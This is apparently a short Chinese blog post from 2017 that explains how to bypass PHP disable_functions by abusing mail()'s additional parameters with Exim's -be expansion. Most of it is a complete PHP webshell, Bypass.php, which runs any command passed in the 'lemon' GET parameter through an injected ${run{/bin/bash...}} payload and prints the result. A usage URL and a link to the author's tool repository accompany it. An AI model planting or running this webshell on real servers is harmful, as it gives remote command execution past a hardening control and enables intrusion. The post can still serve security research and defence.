Exim_mail_bypass_disable_function

为明天沙龙准备弄的一个东西。

前段时间爆出wordpress的远程代码执行,附带了一个mail函数的研究。
绿盟大佬已经分析的很透彻。

http://blog.nsfocus.net/hack-php-mail-additional_parameters/

说一下这个在bypass_disable_function的用途。

环境:

docker pull nicescale/sendmail

disable_function:

dl,eval,exec,passthru,system,popen,shell_exec,proc_open,proc_terminate,show_source,touch,escapeshellcmd,escapeshellarg

Bypass.php

<?php
$c = @$_GET['lemon'];
$result_file = "/tmp/test.txt";
$tmp_file = '/tmp/aaaaaaaaaaa.sh';
$command = $c . '>' . $result_file;
file_put_contents($tmp_file, $command);
$payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}/tmp/aaaaaaaaaaa.sh}{ok}{error}}";
mail("a@localhost", "", "", "", $payload);
echo file_get_contents($result_file);
@unlink($tmp_file);
@unlink($result_file);
?>

使用:Bypass.php?lemon=whoami

项目:https://github.com/l3m0n/Bypass_Disable_functions_Shell

posted @ 2017-05-19 20:47  l3m0n  阅读(1723)  评论(0编辑  收藏  举报